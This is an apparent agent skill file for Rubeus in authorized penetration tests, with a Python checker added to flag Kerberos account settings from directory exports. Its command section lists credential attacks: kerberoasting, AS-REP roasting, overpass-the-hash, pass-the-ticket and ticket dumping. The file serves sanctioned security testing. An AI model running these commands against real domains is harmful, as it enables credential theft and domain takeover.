---
name: rubeus
description: 'Use for tightly scoped Kerberos ticket and account validation during authorized pentests. Trigger on approved ticket analysis, Kerberos exposure review, and proving whether a specific account or host permits unsafe ticket operations.'
argument-hint: 'Domain, host or account scope, and validation goal'
user-invocable: false
---

# Rubeus

## Purpose

Use this skill for narrowly scoped Kerberos ticket inspection or validation when the rules of engagement explicitly allow ticket-focused testing.

## Phase Fit

- Primary: Vulnerability Analysis, Validation and Controlled Impact Demonstration
- Secondary: Retest and Closure

## Use When

- Need to review ticket posture, service tickets, or account exposure in Kerberos workflows.
- Need to validate whether a specific account condition creates material ticket risk.
- Need a repeatable retest after Kerberos hardening.

## Avoid When

- Ticket collection or manipulation is not explicitly approved.
- Domain or account boundaries are unclear.

## Inputs

- Approved domain and account or host scope
- Explicit ticket-handling approval boundaries
- Stop conditions and evidence rules

## Procedure

1. Keep the scope limited to the approved account or host context.
2. Start with the least invasive ticket inspection that answers the question.
3. Escalate to deeper ticket validation only when explicitly approved.
4. Record only the minimum material proof needed.
5. Preserve the exact scope and command path for retest.

## Command Syntax

Replace sample users and domains with approved in-scope values.

```cmd
:: List and triage Kerberos tickets in memory
Rubeus.exe triage
Rubeus.exe klist

:: Kerberoasting: request service tickets (TGS) and write their hashes for offline cracking
Rubeus.exe kerberoast /outfile:C:\temp\tgs.txt

:: AS-REP Roasting: target pre-auth disabled accounts
Rubeus.exe asreproast /outfile:C:\temp\asrep.txt

:: Request TGT with password
Rubeus.exe asktgt /user:auditor /password:<password> /domain:contoso.com /dc:dc01.contoso.com

:: Overpass-the-Hash: request TGT from NT hash
Rubeus.exe asktgt /user:administrator /rc4:<NTLM_hash> /domain:contoso.com /ptt

:: Pass-the-Ticket: inject a ticket into the current session
Rubeus.exe ptt /ticket:<base64_ticket>

:: Dump all Kerberos tickets
Rubeus.exe dump /nowrap
```
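A least-invasive retest check for the account conditions that the `kerberoast` and `asreproast` commands above depend on, reading exported directory attributes instead of requesting tickets. This is an added example, not part of the original skill or of Rubeus; the record layout, function names, finding codes and sample accounts are constructed, and treating an unset `msDS-SupportedEncryptionTypes` as RC4-permitted is an assumption about the domain default.

```python
# userAccountControl and msDS-SupportedEncryptionTypes bit values (Active Directory)
UAC_DONT_REQ_PREAUTH = 0x400000
ENC_DES = 0x01 | 0x02
ENC_RC4 = 0x04
ENC_AES = 0x08 | 0x10


def assess(account):
    """Return sorted finding codes for one account record (dict of LDAP attributes)."""
    uac = int(account.get("userAccountControl", 0))
    findings = set()
    if uac & UAC_DONT_REQ_PREAUTH:
        findings.add("ASREP_NO_PREAUTH")  # condition AS-REP roasting relies on
    if account.get("servicePrincipalName"):
        enc = int(account.get("msDS-SupportedEncryptionTypes") or 0)
        # Assumption: unset/0 falls back to a domain default that permits RC4.
        if enc == 0 or enc & ENC_RC4:
            findings.add("SPN_RC4_PERMITTED")
        if enc & ENC_DES:
            findings.add("SPN_DES_PERMITTED")
        if enc and not enc & ENC_AES:
            findings.add("SPN_NO_AES")
    return sorted(findings)


def retest(accounts, approved_scope):
    """Assess only accounts named in the approved scope; list the rest as skipped."""
    scope = {name.lower() for name in approved_scope}
    results, skipped = {}, []
    for acct in accounts:
        name = acct["sAMAccountName"]
        if name.lower() in scope:
            results[name] = assess(acct)
        else:
            skipped.append(name)  # never evaluated, only recorded
    return results, skipped


# Constructed sample records (not from any real directory).
SAMPLE = [
    {"sAMAccountName": "svc-sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/db01.contoso.com:1433"], "msDS-SupportedEncryptionTypes": 0x1C},
    {"sAMAccountName": "svc-web", "userAccountControl": 0x200,
     "servicePrincipalName": ["HTTP/web01.contoso.com"], "msDS-SupportedEncryptionTypes": 0x18},
    {"sAMAccountName": "legacy-app", "userAccountControl": 0x400200},
    {"sAMAccountName": "out-of-scope", "userAccountControl": 0x400200},
]
```

Run `retest` over attribute exports for the approved accounts before and after hardening; an empty finding list means neither condition remains on that account.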

## Evidence to Capture

- Ticket or account conditions that materially change risk
- Exact domain, host, or account scope used
- Minimal proof path needed for remediation

## Safety Boundaries

- Use only with explicit written approval.
- Protect all ticket material as sensitive evidence.